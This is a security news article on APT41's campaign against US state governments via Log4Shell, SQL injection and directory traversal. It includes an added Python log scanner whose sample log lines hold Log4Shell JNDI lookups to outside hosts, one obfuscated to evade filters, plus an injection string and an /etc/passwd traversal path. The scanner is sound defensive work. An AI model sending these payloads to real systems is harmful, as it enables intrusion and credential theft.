The Cyber Security News
Chinese APT41 Group Compromises Six US Government Networks

March 9, 2022

Security researchers have discovered a major new campaign by Chinese state-sponsored hackers in which they exploited Log4Shell and other bugs to compromise at least six US state government networks.

Mandiant said the activity, observed between May 2021 and February 2022, indicated a deliberate campaign. However, it could not say definitively whether the prolific group known as APT41 was conducting operations for the state or moonlighting for its own gain.

What it did reveal are “significant new capabilities,” including new attack vectors and post-compromise tools and techniques.


The group targeted vulnerable internet-facing web applications for initial access, typically via .NET deserialization attacks, SQL injection and directory traversal vulnerabilities.

APT41 combined zero-day attacks, in this case to compromise the off-the-shelf application USAHerds, with exploits of known bugs such as Log4Shell.

In the case of the latter, they were said to be exploiting Log4j “within hours” of the Apache Foundation’s advisory to compromise at least two US state governments as well as more traditional targets in the insurance and telecoms industries.
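The three initial-access techniques named above (Log4Shell lookups, SQL injection and directory traversal) all leave traces in ordinary web server access logs. The following is an added example, not code from the article or from Mandiant, that scans constructed Apache/Nginx combined-format log lines for those traces. It percent-decodes each field repeatedly (double encoding is common) and collapses the single-character Log4j lookup nesting that was widely used to evade naive `${jndi:` string matching, so that an obfuscated lookup is flagged the same as a plain one. The log lines, IP addresses and hostnames are constructed sample data.

```python
import re
import urllib.parse

# Apache/Nginx "combined" log format:
# client identd user [timestamp] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j lookups that resolve to a single character, e.g. ${lower:j} or ${::-j},
# used to split the literal string "jndi" so simple substring filters miss it.
LOOKUP_CHAR_RE = re.compile(r'\$\{(?:[a-z]+:|::-)([^}])\}')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
SQLI_RE = re.compile(r"""['"]\s*(?:or|and)\b|\bunion\s+select\b""")

# Constructed sample log lines (not from the article or any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:03:15:11 +0000] "GET /api/v1/users?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" '
    '500 88 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:03:16:20 +0000] "GET /static/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" '
    '404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:03:17:30 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:18:45 +0000] "GET /login HTTP/1.1" 200 300 "-" '
    '"${${lower:j}ndi:rmi://203.0.113.9/x}"',
]


def normalize(value):
    """Percent-decode until stable (max 3 rounds), lowercase, then collapse
    single-character Log4j lookups until no more nesting remains."""
    for _ in range(3):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.lower()
    while True:
        collapsed = LOOKUP_CHAR_RE.sub(r'\1', value)
        if collapsed == value:
            return value
        value = collapsed


def classify(value):
    """Return the list of indicator names found in one request field."""
    text = normalize(value)
    hits = []
    if '${jndi:' in text:
        hits.append('log4shell')
    if TRAVERSAL_RE.search(text):
        hits.append('traversal')
    if SQLI_RE.search(text):
        hits.append('sqli')
    return hits


def scan_logs(lines):
    """Parse each combined-format line and check the attacker-controlled
    fields (path, referer, user-agent). Malformed lines are skipped here;
    a production pipeline should count them, since unparseable lines can
    themselves be a symptom of tampering."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        for field in ('path', 'referer', 'ua'):
            for indicator in classify(match.group(field)):
                findings.append({'ip': match.group('ip'),
                                 'ts': match.group('ts'),
                                 'field': field,
                                 'indicator': indicator})
    return findings


if __name__ == '__main__':
    for finding in scan_logs(SAMPLE_LOGS):
        print(f"{finding['ts']} {finding['ip']} {finding['field']}: {finding['indicator']}")
```

The heuristics are deliberately narrow so the example stays readable; in practice the user-agent and referer headers deserve the same scrutiny as the path, because Log4Shell payloads were delivered in any header the application logged, and a detection that only inspects the request line will miss them.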

In late February 2022, APT41 was even found to have re-compromised two former US state government victims.

“APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability,” Mandiant concluded. “The group also demonstrates a willingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use.”

The group was also observed customizing malware to specific target organizations’ environments, and it hid its command-and-control (C2) address in encoded data on tech community forums, which it frequently updated.

“While the ongoing crisis in Ukraine has rightfully captured the world’s attention and the potential for Russian cyber-threats are real, we must remember that other major threat actors around the world are continuing their operations as usual,” argued Mandiant principal threat analyst Geoff Ackerman.

“We cannot allow other cyber activity to fall to the wayside, especially given our observations that this campaign from APT41, one of the most prolific threat actors around, continues to this day.”


Some elements of this post are sourced from:
www.infosecurity-magazine.com

Copyright © TheCyberSecurity.News, All Rights Reserved.